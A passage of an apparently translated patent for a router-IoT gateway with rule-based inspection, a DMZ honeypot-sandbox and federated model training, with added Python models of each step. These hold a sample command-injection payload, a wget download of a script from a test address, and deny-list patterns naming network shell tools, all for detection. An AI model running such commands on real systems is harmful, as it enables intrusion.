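The inspection order of S2021 to S2025 (cache table first, then header rules, then plaintext application-layer rules, with hits written back to the cache table) can be shown as a small runnable model. The following Python is an added example, not code from the patent: the rule fields, the subset of cache-table columns kept, the five-tuple used as the cache key, the 300-second default survival time and the three sample packets are all constructed assumptions.

```python
"""Security component inspection pipeline (S2021-S2025), modelled in Python.

Added example, not code from the patent. The rule fields, the cache table
columns kept here (a subset of those listed above), the five-tuple key and
the sample packets are all constructed assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

FORWARD, DISCARD, ACTIVE_INTERVENTION = "forward", "discard", "active_intervention"


@dataclass(frozen=True)
class Rule:
    """One rule base entry; a field left as None matches any value."""
    name: str
    operation: str
    src_mac: Optional[str] = None
    dst_ip: Optional[str] = None
    dst_port: Optional[int] = None
    l4_proto: Optional[str] = None
    app_proto: Optional[str] = None
    content: Optional[bytes] = None      # application-layer plaintext substring

    def matches_headers(self, pkt: dict) -> bool:
        wanted = (("src_mac", self.src_mac), ("dst_ip", self.dst_ip),
                  ("dst_port", self.dst_port), ("l4_proto", self.l4_proto),
                  ("app_proto", self.app_proto))
        return all(want is None or pkt.get(key) == want for key, want in wanted)


@dataclass
class CacheEntry:
    """Row of the security event cache table (subset of the listed fields)."""
    key: Tuple
    operation: str
    event_id: int
    created: float
    last_hit: float
    max_ttl: float
    state: str = "active"


def five_tuple(pkt: dict) -> Tuple:
    return (pkt["src_ip"], pkt["dst_ip"], pkt["src_port"], pkt["dst_port"], pkt["l4_proto"])


class SecurityComponent:
    def __init__(self, header_rules, content_rules, default_ttl=300.0):
        self.header_rules = list(header_rules)
        self.content_rules = list(content_rules)
        self.cache = {}                  # five-tuple -> CacheEntry
        self.default_ttl = default_ttl
        self.next_event = 1

    def _cache_lookup(self, key, now):
        entry = self.cache.get(key)
        if entry is None:
            return None
        if now - entry.last_hit > entry.max_ttl:   # exceeded maximum survival time
            del self.cache[key]
            return None
        entry.last_hit = now
        return entry

    def _record(self, key, operation, now):        # S2025: update the cache table
        entry = CacheEntry(key, operation, self.next_event, now, now, self.default_ttl)
        self.cache[key] = entry
        self.next_event += 1
        return entry

    def inspect(self, pkt: dict, now: float) -> str:
        key = five_tuple(pkt)
        hit = self._cache_lookup(key, now)                    # S2021: cache first
        if hit is not None:
            return hit.operation
        for rule in self.header_rules:                        # S2022: header rules
            if rule.matches_headers(pkt):
                return self._record(key, rule.operation, now).operation
        if not pkt.get("ciphertext", False):                  # S2023: plaintext only
            payload = pkt.get("payload", b"")
            for rule in self.content_rules:
                if rule.matches_headers(pkt) and rule.content in payload:
                    return self._record(key, rule.operation, now).operation
        return FORWARD                                        # nothing matched


HEADER_RULES = [Rule("block-telnet", DISCARD, dst_port=23, l4_proto="tcp")]
CONTENT_RULES = [Rule("shell-in-http", ACTIVE_INTERVENTION, app_proto="http", content=b"/bin/sh")]

# Constructed sample packets (not captured traffic): telnet probe, HTTP command
# injection attempt, and TLS traffic carrying the same bytes as ciphertext.
SAMPLE_PACKETS = [
    dict(src_ip="203.0.113.5", dst_ip="192.168.1.10", src_port=40000, dst_port=23, l4_proto="tcp"),
    dict(src_ip="203.0.113.5", dst_ip="192.168.1.10", src_port=40001, dst_port=80, l4_proto="tcp",
         app_proto="http", payload=b"GET /cgi-bin/x?cmd=/bin/sh HTTP/1.1"),
    dict(src_ip="203.0.113.7", dst_ip="192.168.1.10", src_port=40002, dst_port=443, l4_proto="tcp",
         app_proto="https", ciphertext=True, payload=b"/bin/sh"),
]


def run_demo():
    sc = SecurityComponent(HEADER_RULES, CONTENT_RULES)
    first = [sc.inspect(p, now=100.0) for p in SAMPLE_PACKETS]
    cached = sc.inspect(SAMPLE_PACKETS[0], now=200.0)   # served from the cache table
    size = len(sc.cache)
    expired = sc.inspect(SAMPLE_PACKETS[0], now=1000.0)  # entry aged out, rules re-run
    return first, cached, size, expired


if __name__ == "__main__":
    print(run_demo())
```

The third sample packet shows the caveat of S2023: the same bytes that trigger the content rule over plain HTTP pass untouched inside TLS, because ciphertext is ignored; that traffic is only ever caught by the sampled NetFlow inspection of S2024, which this model does not implement.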
Further, step S203, in which the Internet of Things gateway component of the all-in-one machine communicates over the network with the user equipment component, specifically comprises the following steps:
S2031: dividing the devices in the Internet of Things gateway into several device groups according to device type and function, and not inspecting communication between devices of the same group;
S2032: when the security component inspects a communication, it first extracts the communication information and matches it against the security event cache table; if the information hits an entry in the table, the operation recorded in that entry is executed directly and the subsequent inspection is skipped, which improves the performance of the security component;
S2033: when communication takes place between different device groups in the Internet of Things gateway component, it passes through the Internet of Things gateway component first; the gateway component only records a sparse sample of the communication and has the security component inspect the communication log, performs no additional security inspection, and restricts the communication of any device whose log inspection is abnormal and reports it;
S2034: the devices in the user equipment group are not managed in groups; when a user device initiates access through the user equipment component, the interaction between devices passes through the user equipment component, which together with the security component samples the communication sparsely and performs communication log inspection, performs no additional security inspection, and restricts the communication of any device whose log inspection is abnormal and reports it;
S2035: the communication between the Internet of Things gateway component and the user equipment component is maintained with the inter-component communication mapping table, in which all lateral communication between components is recorded; by default the ageing time is set to the protocol communication time plus t minutes, and entries that exceed the ageing time are removed from the table, where t is a positive integer, for example t = 1;
S2036: by default the security level of the Internet of Things gateway component is higher than that of the user equipment component; when an Internet of Things device initiates an interaction towards the user equipment component (high security level accessing low security level), the communication is only sparsely sampled and inspected with the machine learning model, abnormal communication is blocked and reported, and the communication of the device concerned is restricted; when the user equipment component initiates an interaction towards the Internet of Things gateway component (low security level accessing high security level), the communication is densely sampled and inspected with the machine learning model, abnormal communication is blocked, and the devices concerned are blocked and reported;
S2037: when the security component encounters an abnormal condition or a security event, updating the security event cache table in the security component.
The user equipment group denotes all devices connected to the user equipment component, i.e. all user terminals such as mobile phones and tablets.
Further, S2031, in which the devices in the Internet of Things gateway are divided into several device groups according to device type and function and communication between devices of the same group is not inspected, specifically comprises the following:
the devices in the Internet of Things gateway component are divided into several device groups according to device type and function; devices inside a group do not communicate with each other directly but through the Internet of Things gateway component, which however performs no inspection of that communication and forwards it directly.
Grouping follows the functional characteristics of the devices, for example: devices that can collect biometric information of the user and therefore concern privacy (smart locks, safes, etc.); devices that can collect user privacy (voice control devices, cameras, electronic peepholes, etc.); devices that provide basic services; other devices (air conditioners, refrigerators, etc.); and remotely controlled devices (smart curtains, etc.).
At the same time, the all-in-one device allows the user to define device classifications, so that the user can group together the devices that the user considers should form a group.
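The policy of S2031 to S2036 reduces to a small decision table: same IoT group, no inspection; different IoT groups or user-to-user, sparse sampling with log inspection; across the two components, the direction relative to the security levels chooses sparse or dense sampling with the machine learning model; and the inter-component mapping table ages entries out at protocol time plus t minutes. The following Python is an added example, not code from the patent: the group names, the default type-to-group map, the numeric security levels and the sample devices are constructed assumptions.

```python
"""Device grouping and inspection policy between the Internet of Things gateway
component and the user equipment component (S2031-S2036), modelled in Python.

Added example, not code from the patent. The group names, the default
type-to-group map, the numeric security levels and the sample devices are
constructed assumptions for illustration.
"""
from dataclasses import dataclass

# Default grouping by device function (the grouping paragraph above).
DEFAULT_GROUPS = {
    "smart_lock": "biometric", "safe": "biometric",
    "voice_assistant": "privacy", "camera": "privacy", "peephole": "privacy",
    "air_conditioner": "other", "refrigerator": "other",
    "curtain": "remote_control",
}
IOT, USER = "iot", "user"
SECURITY_LEVEL = {IOT: 2, USER: 1}     # S2036 default: IoT gateway above user equipment


@dataclass
class Device:
    name: str
    component: str      # IOT or USER
    kind: str


class PolicyEngine:
    def __init__(self, t_minutes: int = 1):
        self.devices = {}
        self.overrides = {}           # user-defined groups (last paragraph of S2031)
        self.mapping_table = {}       # inter-component communication mapping table: (src, dst) -> expiry
        self.aging_extra = t_minutes * 60

    def register(self, dev: Device):
        self.devices[dev.name] = dev

    def set_group(self, name: str, group: str):
        self.overrides[name] = group

    def group_of(self, name: str) -> str:
        dev = self.devices[name]
        if dev.component == USER:
            return "user"             # S2034: user devices are not grouped
        return self.overrides.get(name, DEFAULT_GROUPS.get(dev.kind, "other"))

    def decide(self, src: str, dst: str) -> str:
        """Return the inspection mode the security component applies to src -> dst."""
        s, d = self.devices[src], self.devices[dst]
        if s.component == IOT and d.component == IOT:
            if self.group_of(src) == self.group_of(dst):
                return "forward_uninspected"          # S2031: same group
            return "sparse_sample_log_check"          # S2033: across IoT groups
        if s.component == USER and d.component == USER:
            return "sparse_sample_log_check"          # S2034
        # Cross-component traffic: the direction relative to the security levels
        # decides the sampling density (S2036).
        if SECURITY_LEVEL[s.component] > SECURITY_LEVEL[d.component]:
            return "sparse_sample_model_check"        # high level accessing low
        return "dense_sample_model_check"             # low level accessing high

    def record_session(self, src: str, dst: str, start: float, protocol_duration: float):
        # S2035: an entry ages out at protocol communication time plus t minutes
        self.mapping_table[(src, dst)] = start + protocol_duration + self.aging_extra

    def expire(self, now: float) -> int:
        stale = [k for k, deadline in self.mapping_table.items() if now > deadline]
        for k in stale:
            del self.mapping_table[k]
        return len(stale)


def build_demo() -> PolicyEngine:
    """Constructed home network: two biometric devices, a camera, two user terminals."""
    pe = PolicyEngine(t_minutes=1)
    for dev in (Device("lock", IOT, "smart_lock"), Device("safe", IOT, "safe"),
                Device("cam", IOT, "camera"), Device("phone", USER, "phone"),
                Device("tablet", USER, "tablet")):
        pe.register(dev)
    return pe


if __name__ == "__main__":
    pe = build_demo()
    for pair in (("lock", "safe"), ("lock", "cam"), ("cam", "phone"), ("phone", "cam")):
        print(pair, pe.decide(*pair))
```

Note the consequence of the user-defined override: moving the camera into the biometric group silences inspection of lock-to-camera traffic entirely, so a user regrouping is itself a security-relevant change that the log should record.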
Further, step S204, in which the honeypot sandbox linkage component is exposed to the external network on the routing component and the honeypot listens on a communication interface and captures malicious code, specifically comprises the following steps:
S2041: all communication of the honeypot sandbox linkage component passes through the routing component, and the routing component exposes the honeypot sandbox linkage component to the external network as a DMZ;
S2042: configuring in the security component the security policy for the DMZ zone in which the honeypot sandbox linkage component is located;
S2043: the honeypot sandbox linkage component requests the routing component to open listening interfaces at low priority, and captures malicious code using those listening interfaces.
DMZ (Demilitarized Zone) denotes the devices in the network that are fully exposed to the Internet in an environment isolated from the internal network.
Further, S2042, in which the security policy for the DMZ zone in which the honeypot sandbox linkage component is located is configured in the security component, specifically comprises the following steps:
S20421: configuring the DMZ zone so that it may not actively access any other component with a non-dedicated protocol, and so that the honeypot sandbox linkage component in the DMZ zone may not pass any information out to other components with a non-dedicated protocol; the dedicated protocol is an end-to-end tunnelling protocol designed and implemented by the device manufacturer;
S20422: configuring the user equipment component and the Internet of Things related components so that they may not actively access the DMZ zone in any way or with any protocol;
S20423: configuring the DMZ zone so that it may actively initiate communication to the Internet of Things gateway component only with the dedicated protocol, with that communication controlled by the honeypot sandbox linkage component and registered with the security component; the security component adds every device that communicates with the DMZ zone to the DMZ communication group, lowers the security level of those devices to the minimum, and strictly restricts the communication of the DMZ communication group with other components or devices.
The dedicated protocol is proposed so that honeypots can use devices in the Internet of Things to enhance their trapping capability while these communication flows remain explicitly identifiable.
The dedicated protocol provides an end-to-end tunnel, i.e. a tunnel between the honeypot and the Internet of Things component, in which the original Internet of Things protocol can be encapsulated as the payload.
Further, S2043, in which the honeypot sandbox linkage component requests the routing component to open listening interfaces at low priority and captures malicious code using those listening interfaces, specifically comprises the following steps:
S20431: the routing component maps and exposes all of its transport layer ports at low priority, and registers and marks them in the NAT forwarding table;
S20432: when the internal network initiates communication to the external network, the routing component checks whether the current communication already appears in the NAT forwarding table; if so, it forwards according to the NAT forwarding table, otherwise it cancels the low-priority port mapping entry of the corresponding port and adds the mapping for the current communication;
S20433: when communication is received from the external network, the routing component first checks whether a corresponding entry exists in the NAT forwarding table; if so, it forwards according to the NAT forwarding table, otherwise it matches the low-priority port mapping and hands the current communication to the honeypot sandbox linkage component in the DMZ zone for processing;
S20434: when a normal-priority mapping has exceeded the ageing time of the NAT forwarding table and no further communication has occurred, it is deleted from the NAT forwarding table and automatically reverts to a low-priority port mapping. Low-priority port mappings are not affected by the ageing mechanism of the NAT forwarding table; their lifetime is unbounded.
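The behaviour of S20431 to S20434 is a NAT table in which every external port is pre-mapped to the honeypot at low priority, an outbound flow temporarily takes a port over at normal priority, and ageing hands the port back. The following Python is an added example, not code from the patent: the honeypot address, the port-preserving choice of external port, the check that an inbound packet on a live normal mapping comes from the mapped peer (otherwise it is dropped rather than sent to the honeypot, since the port is no longer low priority), and the sample addresses are constructed assumptions.

```python
"""NAT forwarding table with low-priority honeypot port mappings
(S20431-S20434), modelled in Python.

Added example, not code from the patent. The honeypot address, the
port-preserving choice of external port, the endpoint check on inbound
packets and the sample addresses are constructed assumptions.
"""
from dataclasses import dataclass
from typing import Tuple

HONEYPOT = "10.255.255.2"          # assumed address of the honeypot in the DMZ
LOW, NORMAL = "low", "normal"


@dataclass
class NatEntry:
    proto: str
    external_port: int
    internal: Tuple[str, int]      # (ip, port) behind the NAT
    remote: Tuple[str, int]        # external peer this mapping was created for
    last_seen: float


class NatTable:
    def __init__(self, aging: float = 120.0, protos=("tcp", "udp"), ports=range(1, 65536)):
        self.aging = aging
        self.normal = {}             # (proto, ext_port) -> NatEntry, normal priority
        self.by_session = {}         # (proto, internal, remote) -> ext_port
        # S20431: every transport port starts as a low-priority honeypot mapping.
        self.low = {(p, port) for p in protos for port in ports}

    def outbound(self, proto: str, internal: Tuple[str, int], remote: Tuple[str, int], now: float) -> int:
        """S20432: internal -> external. Returns the external port in use."""
        sess = (proto, internal, remote)
        ext = self.by_session.get(sess)
        if ext is not None:                                  # already in the table
            self.normal[(proto, ext)].last_seen = now
            return ext
        # Port-preserving choice (assumption); fall back to the lowest free port.
        if (proto, internal[1]) in self.low:
            ext = internal[1]
        else:
            ext = min(port for p, port in self.low if p == proto)
        self.low.discard((proto, ext))                       # cancel low-priority entry
        self.normal[(proto, ext)] = NatEntry(proto, ext, internal, remote, now)
        self.by_session[sess] = ext
        return ext

    def inbound(self, proto: str, ext_port: int, remote: Tuple[str, int]) -> Tuple:
        """S20433: external -> router. Returns where the packet is delivered."""
        entry = self.normal.get((proto, ext_port))
        if entry is not None and entry.remote == remote:
            return ("internal",) + entry.internal
        if (proto, ext_port) in self.low:
            return ("honeypot", HONEYPOT, ext_port)          # low-priority catch-all
        return ("drop",)      # port held by another session's normal mapping

    def age(self, now: float) -> int:
        """S20434: expired normal mappings revert to low priority; low ones never age."""
        expired = [k for k, e in self.normal.items() if now - e.last_seen > self.aging]
        for key in expired:
            e = self.normal.pop(key)
            del self.by_session[(e.proto, e.internal, e.remote)]
            self.low.add(key)
        return len(expired)


def run_demo() -> dict:
    """Constructed scenario: unsolicited SSH probe, one outbound HTTPS flow, ageing."""
    nat = NatTable(aging=120.0)
    client, server, scanner = ("192.168.1.20", 50000), ("198.51.100.9", 443), ("203.0.113.66", 4444)
    out = {}
    out["unsolicited_ssh"] = nat.inbound("tcp", 22, scanner)          # nobody mapped 22
    out["ext_port"] = nat.outbound("tcp", client, server, now=0.0)
    out["reply"] = nat.inbound("tcp", out["ext_port"], server)        # legitimate reply
    out["hijack"] = nat.inbound("tcp", out["ext_port"], scanner)      # wrong peer on a live port
    out["aged"] = nat.age(now=200.0)
    out["after_aging"] = nat.inbound("tcp", out["ext_port"], scanner)
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, v)
```

The "hijack" case is the practitioner's caveat: while an internal host holds a port at normal priority, the text's rule "forward if an entry exists" would, read literally, deliver a stranger's packet on that port to the internal host; the model instead drops it, and a real implementation must key normal entries on the remote endpoint as well.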
Further, step S205, in which malicious code is made to interact with the honeypot sandbox linkage component according to the analysis result of the security component, specifically comprises the following steps:
S2051: for traffic that passes the inspection of S2022 and S2023, the session mapping table is maintained and the routing component continues forwarding;
S2052: for traffic that fails the inspection and is explicitly marked as malicious, measures are taken immediately and the communication is lured to the honeypot sandbox linkage component;
S2053: for traffic that fails the inspection but cannot be clearly identified as malicious, the traffic is first blocked and recorded in the security event cache table, while the communication is lured to the honeypot sandbox linkage component in order to attract and contain the attack; if the earlier analysis result can be ruled out after detection, the traffic is so marked in the security event cache table and the communication restriction is lifted, while the marked communication is closely monitored and tracked for a period of time, and as soon as high-risk network communication or communication with sensitive devices and resources is discovered it is blocked promptly.
Further, as shown in fig. 4 and fig. 5, step S2052, in which measures are taken immediately for traffic that fails the inspection and is explicitly marked as malicious and the communication is lured to the honeypot sandbox linkage component, specifically comprises the following steps:
S20521: when malicious communication is found in inbound network communication, the security component notifies the honeypot sandbox linkage component to prepare to take over and monitor the malicious communication, immediately blocks its communication with the internal devices, and adds an entry recording the inspection result to the security event cache table in the security component;
S20522: if malicious code is captured, the malicious code sample is sent to the sandbox for analysis and the threat is reported to the user; if no malicious code is captured, the interaction process is recorded, privacy-related data is desensitised, the current interaction information is reported to the manufacturer's server, and the user is notified of the discovered threat;
S20523: when an internal device is found to send abnormal traffic outward in outbound network communication, a notice or alarm is sent to the user; if high-risk behaviour or network communication is found, the communication is blocked and the device concerned is isolated, so that malicious threats on the isolated device are difficult to spread to other devices, and the user is alerted;
S20524: if the number of infected devices exceeds the set threshold, or the volume of abnormal traffic sent outward by internal devices exceeds the set threshold, the security component disconnects itself from the external network and self-isolates, which reduces the risk of the threat continuing to spread outward; at the same time it enables a standby communication interface, which allows the user to access the all-in-one machine remotely or in an emergency and operate it, and sends the logs and the captured malicious communication to the user and to the device manufacturer's server.
The standby communication interface is a designated TCP/UDP port opened externally by the routing component, the port number being designated by the manufacturer.
That is, normally the ports available to the route lie in the TCP/UDP range 1-65535; when the standby port is activated, all ports other than the TCP/UDP port number corresponding to the standby port are closed.
The steps for luring a communication to the honeypot sandbox linkage component are as follows:
Step a1: the security component initiates a connection teardown or communication suspension operation towards the communication source;
Step a2: the security component initiates a connection teardown (connection reset) operation towards the communication destination and re-initiates a new communication to the destination; if the destination does not support a connection reset operation, its packets are dropped and the security component waits for the destination's connection to time out, after which the destination actively initiates a new connection (if that peer is the one initiating the connection);
Step a3: the security component notifies the honeypot sandbox linkage component of the communication information, and the honeypot sandbox linkage component responds to the communication connection on the basis of the connection initiated by the security component; if the connection is received within the set time, the honeypot attempts lured interaction with the communication, otherwise it actively retries the communication request several times.
Further, step S206, in which, during the interaction and sample capture of the honeypot sandbox linkage component, the honeypot sandbox linkage component passes traffic analysed by the sandbox to the Internet of Things gateway component for processing and returns the information the gateway component sends back to the attacker, specifically comprises the following steps:
S2061: the honeypot sandbox linkage component receives suspicious or malicious communication that actively hits the DMZ zone or is lured there by the security component;
S2062: the honeypot creates the corresponding instance and registers it with the honeypot sandbox linkage component; when external network communication is involved, the NAT forwarding table and the session mapping table are updated, and when internal network communication is involved, the inter-component communication mapping table and the session mapping table are updated and maintained.
S2063: for communication that can interact with the honeypot sandbox linkage component, the honeypot sandbox linkage component uses the set communication protocol as the situation requires, so that a sandbox in the honeypot sandbox linkage component directly accesses real Internet of Things devices in the Internet of Things gateway component;
S2064: under the supervision of the security component, some of the commands executed in the honeypot are processed and sent over the set communication protocol to the sandbox for pre-analysis, so as to eliminate potential safety hazards;
S2065: commands that pass the auxiliary sandbox test are sent to the real Internet of Things device, and the honeypot waits for the device's response and uses it as its own response; the honeypot sandbox linkage component selects, among the several Internet of Things devices, those that assist its operation according to the communication protocol, the interaction and the performance situation.
S2066: the honeypot sandbox linkage component desensitises, obfuscates and replaces the information returned by the real Internet of Things device before finally returning it to the communication peer.
Further, step S2062 also comprises: making the relevant records in the communication mapping table and the session mapping table to prevent conflicts with normal communication. If a conflict with normal communication does arise, the relevant mapping and analysis parameters are adjusted actively on the basis that normal communication continues undisturbed; if the conflict persists after adjustment (i.e. normal communication cannot be left unaffected), the interaction attempt is abandoned and the relevant interaction is resumed after the resource is subsequently released (if the destination can still respond).
Illustratively, S2064, in which, under the supervision of the security component, some of the commands executed in the honeypot are processed and sent over the set communication protocol to the sandbox for pre-analysis so as to eliminate potential safety hazards, specifically comprises the following:
all write operations, and all operations that execute scripts, executable files or programs, are identified and blocked to prevent penetration into the user's real Internet of Things devices.
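The pre-analysis of S2064 and the desensitisation of S2066 together form the relay between the honeypot and a real device: classify the command, forward it only if it is read-only, and strip identifying data from whatever the device returns. The following Python is an added example, not code from the patent: the command patterns, the three verdict labels, the masking rules (keep the MAC OUI, redact serial numbers, replace addresses with a TEST-NET value, swap the model name for a decoy) and the fake camera device are constructed assumptions; a real deployment would match the device's actual management protocol rather than shell-like text.

```python
"""Pre-analysis of honeypot commands before they reach a real Internet of Things
device (S2064, S2065) and desensitisation of the device's reply (S2066),
modelled in Python.

Added example, not code from the patent. The command patterns, the
classification labels, the masking rules and the fake device are constructed
assumptions; a real deployment would match the device's actual protocol.
"""
import re
from typing import Callable, Tuple

# Write operations and script/executable/program execution are blocked (S2064).
EXEC_PATTERNS = [
    r"\b(sh|bash|ash|dash|python\d?|perl|lua|wget|curl|tftp|ftpget|chmod|nc|telnetd)\b",
    r"(^|[\s;&|])\./",                 # running a dropped file from a relative path
    r"\.(sh|py|elf|bin)\b",
]
WRITE_PATTERNS = [
    r"\b(set|write|put|update|delete|rm|mv|cp|dd|mkfs|echo|touch|tee)\b",
    r"[>|]",                           # redirection or pipeline
]


def classify(command: str) -> str:
    """Return 'allowed', 'blocked_exec' or 'blocked_write' for one command."""
    text = command.strip().lower()
    if any(re.search(p, text) for p in EXEC_PATTERNS):
        return "blocked_exec"
    if any(re.search(p, text) for p in WRITE_PATTERNS):
        return "blocked_write"
    return "allowed"


# S2066: desensitise, obfuscate and replace identifying data in the reply.
MAC = re.compile(r"\b(?:[0-9a-f]{2}:){5}[0-9a-f]{2}\b", re.I)
SERIAL = re.compile(r"\b(sn|serial)[=:]\s*\S+", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MODEL_REPLACEMENTS = {"ACME-CAM-2000": "GenericCam"}   # constructed decoy model name


def desensitize(reply: str) -> str:
    for real, decoy in MODEL_REPLACEMENTS.items():
        reply = reply.replace(real, decoy)                           # replacement
    reply = SERIAL.sub(lambda m: m.group(1) + "=REDACTED", reply)    # desensitisation
    reply = MAC.sub(lambda m: m.group(0)[:9] + "xx:xx:xx", reply)    # keep OUI only
    reply = IPV4.sub("192.0.2.1", reply)                             # obfuscation (TEST-NET-1)
    return reply


def relay(command: str, device: Callable[[str], str]) -> Tuple[str, str]:
    """Run the S2064-S2066 path for one command: pre-analyse, forward if safe,
    desensitise the real device's reply before it goes back to the attacker."""
    verdict = classify(command)
    if verdict != "allowed":
        return verdict, "error: command failed"      # honeypot answers on its own
    return verdict, desensitize(device(command))


def fake_device(command: str) -> str:
    """Constructed stand-in for a real camera's management interface."""
    if command.strip().lower() == "get info":
        return "model=ACME-CAM-2000 sn=AC12345678 mac=a4:c1:38:9f:20:11 ip=192.168.1.77 fw=1.2.3"
    return "ok"


if __name__ == "__main__":
    for cmd in ("GET info", "SET wifi.ssid evil", "wget http://203.0.113.9/a.sh -O /tmp/a.sh",
                "cat /proc/version", "echo 1 > /proc/sys/net/ipv4/ip_forward"):
        print(cmd, "->", relay(cmd, fake_device))
```

A deny-list of this kind is the weak point of the scheme: an attacker who learns the device's real command syntax will look for a write or execution primitive the list does not name, so in practice the filter should be an allow-list of the specific read-only requests the tunnel is permitted to carry.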
Further, step S207, in which the honeypot sandbox linkage component analyses the captured malicious code, extracts its software behaviour and network behaviour, and trains the convolutional neural network with these as the labels of the malicious code, specifically comprises the following steps:
S2071: after the honeypot sandbox linkage component captures malicious code, it passes the code directly to the sandbox for analysis;
S2072: the sandbox starts the analysis process and analyses the malicious code at the system level and at the network level;
S2073: after feature extraction, the data is desensitised, the desensitised data is privacy-checked by the data set component in the honeypot sandbox linkage component, and data that cannot be desensitised is used only after an obfuscation operation;
S2074: a machine learning model is trained with the desensitised data;
S2075: the federated learning network server of the all-in-one manufacturer checks the trained machine learning models submitted by all the all-in-one machines using known, confirmed malicious traffic, compares the different machine learning models comprehensively, and sets corresponding weights;
S2076: the federated learning network server of the all-in-one manufacturer initiates a blockchain write, recording the model ID, the weight, the parameters, the submitter and related information on the chain under the consensus of the majority of the online all-in-one machines;
S2077: after the write is completed, the machine learning models are fused with the federated learning technique according to the block information, and access to the fused model is then opened.
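Steps S2075 to S2077 (and the verification an all-in-one machine performs in S2081 using the chain) can be exercised end to end with a toy model: score each submission on known flows, weight it accordingly, write each submission and the fused result to a hash chain, and have the client check the received parameters against the last block. The following Python is an added example, not code from the patent: the linear toy model, the accuracy-based weighting rule with a 0.75 cut-off, the block layout and the validation flows are constructed assumptions, and consensus among the online machines is not modelled.

```python
"""Weighted model fusion with a hash-chained record of every submission
(S2075-S2077), and the check an all-in-one machine performs on the model it
receives using that record (S2081), modelled in Python.

Added example, not code from the patent. The linear toy model, the
accuracy-based weighting rule, the block layout and the validation flows are
constructed assumptions; consensus among the online machines is not modelled.
"""
import hashlib
import json
from typing import Dict, List, Tuple

Sample = Tuple[Tuple[float, float, float], bool]   # (features incl. bias, is_malicious)


def predict(params: List[float], x) -> bool:
    """Toy linear model (assumption): a flow is malicious when the score is positive."""
    return sum(p * xi for p, xi in zip(params, x)) > 0


def accuracy(params: List[float], samples: List[Sample]) -> float:
    return sum(predict(params, x) == y for x, y in samples) / len(samples)


def params_digest(params: List[float]) -> str:
    return hashlib.sha256(json.dumps(params).encode()).hexdigest()


class Ledger:
    """Append-only hash chain standing in for the blockchain of S2076."""
    GENESIS = "0" * 64

    def __init__(self):
        self.blocks = []

    @staticmethod
    def _hash(prev: str, record: dict) -> str:
        body = json.dumps(record, sort_keys=True)
        return hashlib.sha256((prev + body).encode()).hexdigest()

    def append(self, record: dict) -> dict:
        prev = self.blocks[-1]["hash"] if self.blocks else self.GENESIS
        block = {"index": len(self.blocks), "prev": prev, "record": record,
                 "hash": self._hash(prev, record)}
        self.blocks.append(block)
        return block

    def verify(self) -> bool:
        prev = self.GENESIS
        for i, b in enumerate(self.blocks):
            if b["index"] != i or b["prev"] != prev or b["hash"] != self._hash(prev, b["record"]):
                return False
            prev = b["hash"]
        return True


def fuse(submissions: List[dict], validation: List[Sample], ledger: Ledger,
         min_accuracy: float = 0.75) -> Tuple[List[float], Dict[str, float]]:
    """S2075: score every submitted model on known malicious/benign flows and
    weight it by that score (zero below min_accuracy). S2076: write model ID,
    weight, parameter digest and submitter to the chain. S2077: weighted average."""
    weights = {}
    for sub in submissions:
        acc = accuracy(sub["params"], validation)
        weights[sub["model_id"]] = acc if acc >= min_accuracy else 0.0
        ledger.append({"model_id": sub["model_id"], "submitter": sub["submitter"],
                       "weight": weights[sub["model_id"]],
                       "params_sha256": params_digest(sub["params"])})
    total = sum(weights.values())
    dim = len(submissions[0]["params"])
    fused = [sum(weights[s["model_id"]] * s["params"][i] for s in submissions) / total
             for i in range(dim)]
    ledger.append({"model_id": "fused", "submitter": "federated-server", "weight": 1.0,
                   "params_sha256": params_digest(fused)})
    return fused, weights


def client_verify(fused: List[float], ledger: Ledger) -> bool:
    """S2081: an all-in-one accepts a model only if the chain is intact and the
    latest block's digest matches the parameters it received."""
    return ledger.verify() and ledger.blocks[-1]["record"]["params_sha256"] == params_digest(fused)


# Constructed validation flows: (outbound byte ratio, distinct-port ratio, bias).
VALIDATION: List[Sample] = [((0.9, 0.8, 1.0), True), ((0.7, 0.9, 1.0), True),
                            ((0.1, 0.2, 1.0), False), ((0.3, 0.1, 1.0), False)]
# Constructed submissions: a good model, a weaker one, and an inverted (poisoned) one.
SUBMISSIONS = [
    {"model_id": "A", "submitter": "aio-0001", "params": [1.0, 1.0, -1.0]},
    {"model_id": "B", "submitter": "aio-0002", "params": [1.0, 0.0, -0.8]},
    {"model_id": "C", "submitter": "aio-0003", "params": [-1.0, -1.0, 1.0]},
]


def run_demo():
    ledger = Ledger()
    fused, weights = fuse(SUBMISSIONS, VALIDATION, ledger)
    intact = client_verify(fused, ledger)
    ledger.blocks[2]["record"]["weight"] = 1.0       # tamper: promote the poisoned model
    return fused, weights, intact, client_verify(fused, ledger)


if __name__ == "__main__":
    print(run_demo())
```

The inverted submission "C" is the model-poisoning case the validation step in S2075 exists for: it receives weight zero and contributes nothing to the fused parameters, while the chain makes any later attempt to rewrite its recorded weight detectable by every client.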
Further, S2072, in which the sandbox starts the analysis process and analyses the malicious code at the system level and at the network level, specifically comprises the following:
at the system level, the IO operations, system stack calls, memory use, file dropping, API calls and other system- and software-related information of the malicious code are analysed and an analysis report is generated; during analysis, taint analysis is used to trigger as many execution paths of the malicious code as possible, so as to obtain more comprehensive system-level information and trigger more network behaviour;
at the network level, the parameters of the network interactions are analysed; finally the generated network traffic is packetised and the data set component extracts features using feature engineering.
Further, S2074, in which a machine learning model is trained with the desensitised data, specifically comprises the following:
constructing a training set, which consists of network traffic labelled as known malicious code or non-malicious code;
constructing a machine learning model, which is a convolutional neural network;
inputting the training set into the machine learning model and training it to obtain the trained machine learning model.
Further, S2074, in which a machine learning model is trained with the desensitised data, also comprises the following:
during training, either the all-in-one machine or the cloud performs the training, according to the configured decision;
if the all-in-one machine trains, it plans its device performance, reserves the device performance required for the user's normal network needs, and uses the surplus performance, or the whole device performance when the network load is low at night, for local model training;
if cloud training is used, the desensitised data is encrypted with the encryption key distributed by the device manufacturer to the user and sent to the device manufacturer's cloud server for model training as outsourced computation; the trained model is likewise encrypted with that key and returned to the user; after the user has received it, the cloud server immediately destroys all user data and destroys the key to ensure data security, and the machine learning model is then sent to the all-in-one manufacturer's federated learning network for model fusion.
Further, the step S208: the safety component is used for checking and accepting the trained convolutional neural network and checking and monitoring communication passing through the integrated machine through the trained convolutional neural network; the method specifically comprises the following steps:
S2081: the security component periodically checks and upgrades the rule base and the machine learning model;
S2082: deploying the rule base and the machine learning model in the integrated machine;
S2083: the deployed rule base and machine learning model operate normally in the integrated machine to identify abnormal communication.
